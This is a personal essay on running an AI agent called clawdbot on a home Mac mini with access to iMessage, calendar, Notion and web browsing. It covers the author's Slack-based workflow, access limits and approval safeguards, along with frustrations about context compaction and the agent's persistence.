clawd­bot gets mean­ing­fully bet­ter the more you use it, and it gets bet­ter in a fast, or­ganic way that feels less cum­ber­some than writ­ing rules for claude code or yelling at any other LLM. it feels much closer to work­ing with a real ex­ec­u­tive as­sis­tant (in part be­cause the clawd­bot har­ness/​sys­tem prompts are very good), which makes me want to give it more and more re­spon­si­bil­ity.

how’d you set it up?

i run clawd­bot on a mac mini in my home. the mac mini’s pri­mary job is run­ning clawd­bot and it stays on 24/7. why a mac mini?

one of the core use cases is brows­ing web­sites and some­times log­ging into them. to do this con­vinc­ingly (without trig­ger­ing tons of captchas and “is this a new IP?” alerts), clawd­bot needs to be open­ing sites from my home, not the cloud; and it needs to do so in a real google chrome win­dow.

many of the ways clawd­bot ac­cesses data are mac-only. specif­i­cally, clawd­bot can read and send iMes­sages (real blue bub­bles!); man­age my todo and gro­cery lists in ap­ple re­minders; and use my ap­ple con­tacts as a source of truth. ap­ple will only let you do these things with­out get­ting banned on a real bona fide mac.

i com­mu­ni­cate with clawd­bot via a pri­vate slack work­space. many oth­ers have shot them­selves in the foot set­ting it up on what­sapp or telegram (since the bot re­sponds as you to oth­ers). slack is great be­cause:

it’s fa­mil­iar to me—i’ve spent over a decade work­ing in and man­ag­ing slack work­spaces.

i can cre­ate sep­a­rate chan­nels for dif­fer­ent top­ics. #ai-notifs is only for in­bound alerts.

i can have sev­eral work­flows go­ing at once, since each chan­nel’s his­tory is iso­lated. i cre­ated #ai-1, #ai-2, #ai-3, and so on—just for mul­ti­task­ing. (i may ex­plore adding my part­ner at some point, and it’ll be easy since slack is, well, meant for mul­ti­player.)

clawd­bot com­mu­ni­cates with me by send­ing slack no­ti­fi­ca­tions. be­hind the scenes it also makes changes to my cal­en­dar—mov­ing events around, adding “soft hold” events, send­ing in­vites—and man­ages my ap­ple re­minders and no­tion pages. clawd­bot never com­mu­ni­cates with oth­ers on its own.

i give clawd­bot a toolkit of ac­cess. the most use­ful ones have been:

my text mes­sages. i con­duct a lot of work and daily life over imes­sage. frus­trat­ingly, un­like email, tex­ting has very poor tool­ing. where my email app au­to­mat­i­cally pulls up my cal­en­dar when it sees dates/​times, tex­ting me “call to­mor­row 4pm?” does not. when some­one sends me a cal­en­dar in­vite, it’s both in my in­box and on my cal­en­dar; when some­one texts me “yep let’s do it”, nei­ther is true. clawd­bot has given me mas­sive lift here. (yes, this also gives clawd­bot ac­cess to 2FA codes.)

my cal­en­dar. i also have a shared cal­en­dar with my part­ner; clawd­bot sees both.

my no­tion work­space. for me this is a gen­eral catch-all for stor­ing and man­ag­ing in­for­ma­tion; the ap­ple notes app could also work.

web brows­ing. in a way this is the most im­por­tant one—it’s in­fi­nite tools in one. but it’s also where the risk con­cen­trates, so i al­ways give clawd­bot a start­ing URL rather than let­ting it browse freely.

no­tably, i haven’t given clawd­bot ac­cess to my email—my tool­ing there is al­ready good enough that i usu­ally do things my­self. i’ve also found the ways clawd­bot can help here to be cum­ber­some and lim­ited. i may re­visit if i find a killer use case.

i don’t al­low my clawd­bot to ac­cess so­cial net­work­ing web­sites (it does­n’t read x/​twit­ter, for ex­am­ple). this seems high risk and no re­ward.

i don’t give clawd­bot ac­cess to all my lo­gins. (there’s a 1password in­te­gra­tion which is… pretty wild.) when i do, i try to use google chrome’s na­tive pass­word man­ager so that clawd­bot does­n’t need to man­age pass­words in con­text di­rectly. (note that it still has ac­cess to pass­words be­cause it can aut­ofill and then read it off the page, but i’ve at least added more hoops.)

i don’t let clawd­bot send text mes­sages with­out my ex­plicit ap­proval, and i’ve built safe­guards in those skills to en­force this.

i did­n’t add my clawd­bot to molt­book so it can plot against me at my ex­pense. sorry.

i use claude opus 4.5. i haven’t ex­per­i­mented with cheaper mod­els. my view is that any mis­take by the model costs me way more than the pre­mium, so i’d rather stay on the cut­ting edge than try to op­ti­mize for to­kens.

con­text man­age­ment can be an­noy­ing. when clawd­bot is brows­ing sites or do­ing re­search, con­text oc­ca­sion­ally fills up and gets com­pacted (older con­ver­sa­tion his­tory gets deleted to make room). this al­ways seems to hap­pen at the worst time—right when i’m deep into some­thing and have built up mo­men­tum. a frus­trat­ing “ugh, i guess this re­ally is just a word pre­dic­tor” mo­ment. to avoid this i’m con­stantly start­ing new ses­sions, which i wish clawd­bot would do for me.

clawd­bot does­n’t know when to give up. its de­ter­mi­na­tion is usu­ally a strength, but it lacks the hu­man cir­cuit breaker of “am i try­ing too hard here?” and some­times burns through a lot of time/​to­kens on some­thing a hu­man would have aban­doned.